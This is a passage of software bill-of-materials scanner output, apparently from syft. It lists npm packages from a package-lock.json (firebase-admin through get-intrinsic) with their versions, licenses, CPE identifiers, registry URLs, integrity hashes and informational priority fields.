cpe:2.3:a:firebase:firebase_admin:12.7.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/firebase-admin@12.7.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/firebase-admin/-/firebase-admin-12.7.0.tgz + integrity: sha512-raFIrOyTqREbyXsNkSHyciQLfv8AUZazehPaQS1lZBSCDYW74FYXU0nQZa3qHI4K+hawohlDbywZ4+qce9YNxA== + dependencies: + '@fastify/busboy': ^3.0.0 + '@firebase/database-compat': 1.0.8 + '@firebase/database-types': 1.0.5 + '@types/node': ^22.0.1 + farmhash-modern: ^1.1.0 + jsonwebtoken: ^9.0.0 + jwks-rsa: ^3.1.0 + node-forge: ^1.3.1 + uuid: ^10.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a972164b3d990123 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: follow-redirects 1.16.0' + title: follow-redirects 1.16.0 + description: 'Package discovered: follow-redirects 1.16.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a8847fd98501e6bd + name: follow-redirects + version: 1.16.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:follow-redirects:follow_redirects:1.16.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/follow-redirects@1.16.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.16.0.tgz + integrity: sha512-y5rN/uOsadFT/JfYwhxRS5R7Qce+g3zG97+JrtFZlC9klX/W5hD7iiLzScI4nZqUS7DNUdhPgw4xI8W2LuXlUw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a2e20f1dd4ff167a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fontkit 2.0.4' + title: fontkit 2.0.4 + description: 'Package discovered: fontkit 2.0.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 83c2ace663a40ea8 + name: fontkit + version: 2.0.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fontkit:fontkit:2.0.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fontkit@2.0.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fontkit/-/fontkit-2.0.4.tgz + integrity: sha512-syetQadaUEDNdxdugga9CpEYVaQIxOwk7GlwZWWZ19//qW4zE5bknOKeMBDYAASwnpaSHKJITRLMF9m1fp3s6g== + dependencies: + '@swc/helpers': ^0.5.12 + brotli: ^1.3.2 + clone: ^2.1.2 + dfa: ^1.2.0 + fast-deep-equal: ^3.1.3 + restructure: ^3.0.0 + tiny-inflate: ^1.0.3 + unicode-properties: ^1.4.0 + unicode-trie: ^2.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0277ddadc8ca9fad + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: foreground-child 3.3.1' + title: foreground-child 3.3.1 + description: 'Package discovered: foreground-child 3.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: be5a9ebbd8259fbe + name: foreground-child + version: 3.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:foreground-child:foreground-child:3.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:foreground-child:foreground_child:3.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:foreground_child:foreground-child:3.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:foreground_child:foreground_child:3.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:foreground:foreground-child:3.3.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:foreground:foreground_child:3.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/foreground-child@3.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz + integrity: sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw== + dependencies: + cross-spawn: ^7.0.6 + signal-exit: ^4.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f31639275e9af4b4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: form-data 2.5.5' + title: form-data 2.5.5 + description: 'Package discovered: form-data 2.5.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: cccf1222c38fa883 + name: form-data + version: 2.5.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:form-data:form-data:2.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form-data:form_data:2.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form_data:form-data:2.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form_data:form_data:2.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form:form-data:2.5.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form:form_data:2.5.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/form-data@2.5.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/form-data/-/form-data-2.5.5.tgz + integrity: sha512-jqdObeR2rxZZbPSGL+3VckHMYtu+f9//KXBsVny6JSX/pa38Fy+bGjuG8eW/H6USNQWhLi8Num++cU2yOCNz4A== + dependencies: + asynckit: ^0.4.0 + combined-stream: ^1.0.8 + es-set-tostringtag: ^2.1.0 + hasown: ^2.0.2 + mime-types: ^2.1.35 + safe-buffer: ^5.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f04370c9bd4302d0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: form-data 4.0.5' + title: form-data 4.0.5 + description: 'Package discovered: form-data 4.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fb8802f2379acb63 + name: form-data + version: 4.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:form-data:form-data:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form-data:form_data:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form_data:form-data:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form_data:form_data:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form:form-data:4.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:form:form_data:4.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/form-data@4.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz + integrity: sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w== + dependencies: + asynckit: ^0.4.0 + combined-stream: ^1.0.8 + es-set-tostringtag: ^2.1.0 + hasown: ^2.0.2 + mime-types: ^2.1.12 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 309869a00f00319d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: forwarded 0.2.0' + title: forwarded 0.2.0 + description: 'Package discovered: forwarded 0.2.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e972502f7a8ea944 + name: forwarded + version: 0.2.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:forwarded_project:forwarded:0.2.0:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/forwarded@0.2.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz + integrity: sha512-buRG0fpBtRHSTCOASe6hD258tEubFoRLb4ZNA6NxMVHNw2gOcwHo9wyablzMzOA5z9xA9L1KNjk/Nt6MT9aYow== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f433c70fa1fc6314 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fraction.js 5.3.4' + title: fraction.js 5.3.4 + description: 'Package discovered: fraction.js 5.3.4' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f45608cb782e3ae1 + name: fraction.js + version: 5.3.4 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fraction.js:fraction.js:5.3.4:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fraction.js@5.3.4 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fraction.js/-/fraction.js-5.3.4.tgz + integrity: sha512-1X1NTtiJphryn/uLQz3whtY6jK3fTqoE3ohKs0tT+Ujr1W59oopxmoEh7Lu5p6vBaPbgoM0bzveAW4Qi5RyWDQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 9a535c2456d85e31 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fresh 0.5.2' + title: fresh 0.5.2 + description: 'Package discovered: fresh 0.5.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7908a3419570e85d + name: fresh + version: 0.5.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fresh_project:fresh:0.5.2:*:*:*:*:node.js:*:* + source: nvd-cpe-dictionary + purl: pkg:npm/fresh@0.5.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fresh/-/fresh-0.5.2.tgz + integrity: sha512-zJ2mQYM18rEFOudeV4GShTGIQ7RbzA7ozbU9I/XBpm7kqgMywgmylMwXHxZJmkVoYkna9d2pVXVXPdYTP9ej8Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2b4f03d780920bbf + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: fsevents 2.3.3' + title: fsevents 2.3.3 + description: 'Package discovered: fsevents 2.3.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 585a401b2834ec08 + name: fsevents + version: 2.3.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:fsevents:fsevents:2.3.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/fsevents@2.3.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz + integrity: sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ed6c41b4eae5b77e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: function-bind 1.1.2' + title: function-bind 1.1.2 + description: 'Package discovered: function-bind 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a9db1e71931f56ac + name: function-bind + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:function-bind:function-bind:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:function-bind:function_bind:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:function_bind:function-bind:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:function_bind:function_bind:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:function:function-bind:1.1.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:function:function_bind:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/function-bind@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz + integrity: sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1567b7d3e95e72e5 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: functional-red-black-tree 1.0.1' + title: functional-red-black-tree 1.0.1 + description: 'Package discovered: functional-red-black-tree 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 06c01b9cd08a3446 + name: functional-red-black-tree + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:functional-red-black-tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional-red-black-tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional_red_black_tree:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional_red_black_tree:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional-red-black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional-red-black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional_red_black:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional_red_black:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional-red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional-red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional_red:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional_red:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional:functional-red-black-tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:functional:functional_red_black_tree:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/functional-red-black-tree@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz + integrity: sha512-dsKNQNdj6xA3T+QlADDA7mOSlX0qiMINjn0cgr+eGHGsbSHzTabcIogz2+p/iqP1Xs6EP/sS2SbqH+brGTbq0g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2d3340f07fdb7b3f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: gaxios 6.7.1' + title: gaxios 6.7.1 + description: 'Package discovered: gaxios 6.7.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9d900b217a57abee + name: gaxios + version: 6.7.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/gaxios@6.7.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz + integrity: sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ== + dependencies: + extend: ^3.0.2 + https-proxy-agent: ^7.0.1 + is-stream: ^2.0.0 + node-fetch: ^2.6.9 + uuid: ^9.0.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 88029de581a160cb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: gcp-metadata 6.1.1' + title: gcp-metadata 6.1.1 + description: 'Package discovered: gcp-metadata 6.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: aa3886c02ba5c2c5 + name: gcp-metadata + version: 6.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/gcp-metadata@6.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz + integrity: sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A== + dependencies: + gaxios: ^6.1.1 + google-logging-utils: ^0.0.2 + json-bigint: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: c4a7ba3815d4fc91 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: get-caller-file 2.0.5' + title: get-caller-file 2.0.5 + description: 'Package discovered: get-caller-file 2.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: adc0dd4bf4f30c10 + name: get-caller-file + version: 2.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: ISC + spdxExpression: ISC + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/get-caller-file@2.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz + integrity: sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fcd2d596421aca4c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: get-intrinsic 1.3.0' + title: get-intrinsic 1.3.0 + description: 'Package discovered: get-intrinsic 1.3.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 338eac46e71d483e + name: get-intrinsic + version: 1.3.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + 